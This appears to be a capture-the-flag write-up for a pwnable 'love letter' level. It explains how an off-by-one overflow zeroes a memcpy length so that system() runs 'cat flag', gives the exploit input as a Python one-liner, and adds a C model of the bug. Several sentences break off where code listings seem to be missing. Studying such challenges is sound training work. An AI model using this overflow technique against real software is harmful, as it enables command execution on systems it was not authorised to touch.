Surprisingly, before me, this pwnable level was only pwned 74 times, and there is no write-up available online. So I decided to share my solution.
There is no source code, so you have to reverse engineer the binary. The problem lies in the highlighted line of
Essentially it copies the next byte.
To solve it, we need to somehow force the
system(loveletter) call to be
The total buffer is 256 bytes, memset to
\x00. The goal is to set the length of the first memcpy to 0. This erases the first part of the love letter (the echo I love prefix), so execution goes directly to
system('cat flag <garbage>').
The solution is:
python -c "print('cat flag' + ' '*245 + '$')". Now onto why this works.
When the code above executes, we will have
eax pointing to
This will overwrite the buffer and propagate into
edx, which is the length used by the 1st memcpy and is loaded by
mov edx, [esp+110h] (see below).
This of course erases
echo I love from the command, so what reaches system() is
cat flag followed by the padding, and cat flag gets executed.
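To make the mechanism concrete, here is an added C model of the bug class described above; it is not the level's binary and not the author's code. It assumes a hypothetical frame layout in which the 256-byte letter buffer sits directly below the 32-bit length word used by the first memcpy, an unbounded byte-by-byte copy that also copies the terminating NUL ("copies the next byte"), and a little-endian target (x86, as the eax/edx registers above imply). Because the real frame is not reproduced, the payload that zeroes the length in this model is 256 bytes long rather than the 254 bytes used against the actual level. The model builds the command string instead of calling system() so it can be run safely.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical frame layout (assumption, not the real binary): the letter
 * buffer is immediately followed by the length the first memcpy will use. */
struct frame {
    char letter[256];     /* memset to \x00 before use */
    uint32_t prefix_len;  /* length passed to the first memcpy */
};

static const char PREFIX[] = "echo I love ";  /* what the first memcpy copies */

/* Model of the vulnerable copy: copies the input byte by byte until the '$'
 * terminator with no bound check, then writes the terminating NUL too.
 * Writes go through a byte pointer over the whole struct, so an input of
 * 256 bytes puts the NUL into the low byte of prefix_len (little-endian). */
static void copy_name(struct frame *f, const char *input)
{
    unsigned char *raw = (unsigned char *)f;   /* letter starts at offset 0 */
    size_t i = 0;
    while (i < sizeof(*f) - 1 && input[i] != '$' && input[i] != '\0') {
        raw[i] = (unsigned char)input[i];
        i++;
    }
    raw[i] = '\0';   /* overflow point: index 256 is prefix_len's low byte */
}

/* Builds the command the program would hand to system(). Returns the
 * prefix length actually used by the first memcpy (0 once clobbered). */
static uint32_t build_command(struct frame *f, const char *input,
                              char *out, size_t outsz)
{
    memset(f, 0, sizeof(*f));
    f->prefix_len = (uint32_t)strlen(PREFIX);   /* 12 before the overflow */
    copy_name(f, input);

    size_t n = f->prefix_len;                   /* length loaded from the frame */
    if (n > outsz - 1) n = outsz - 1;
    memcpy(out, PREFIX, n);                     /* 1st memcpy: the prefix */

    size_t l = strnlen(f->letter, sizeof(f->letter));
    if (l > outsz - 1 - n) l = outsz - 1 - n;
    memcpy(out + n, f->letter, l);              /* 2nd memcpy: the letter */
    out[n + l] = '\0';
    return f->prefix_len;
}

/* Constructed payload, same shape as the write-up's: "cat flag", padding,
 * then the '$' terminator. 8 + 248 = 256 bytes fill the buffer exactly. */
static size_t make_payload(char *buf, size_t bufsz)
{
    const char *cmd = "cat flag";
    size_t cmdlen = strlen(cmd);
    size_t total = 256;
    if (bufsz < total + 2) return 0;
    memcpy(buf, cmd, cmdlen);
    memset(buf + cmdlen, ' ', total - cmdlen);
    buf[total] = '$';
    buf[total + 1] = '\0';
    return total;
}

int main(void)
{
    struct frame f;
    char cmd[512];
    char payload[300];

    build_command(&f, "alice$", cmd, sizeof(cmd));
    printf("benign : prefix_len=%u  cmd=\"%s\"\n", f.prefix_len, cmd);

    make_payload(payload, sizeof(payload));
    build_command(&f, payload, cmd, sizeof(cmd));
    printf("overflow: prefix_len=%u  cmd starts with \"%.8s\"\n",
           f.prefix_len, cmd);
    return 0;
}
```

The benign input yields the intended "echo I love alice"; the overflow input zeroes prefix_len, the first memcpy copies nothing, and the string handed to system() begins with cat flag followed by the padding, which the shell ignores.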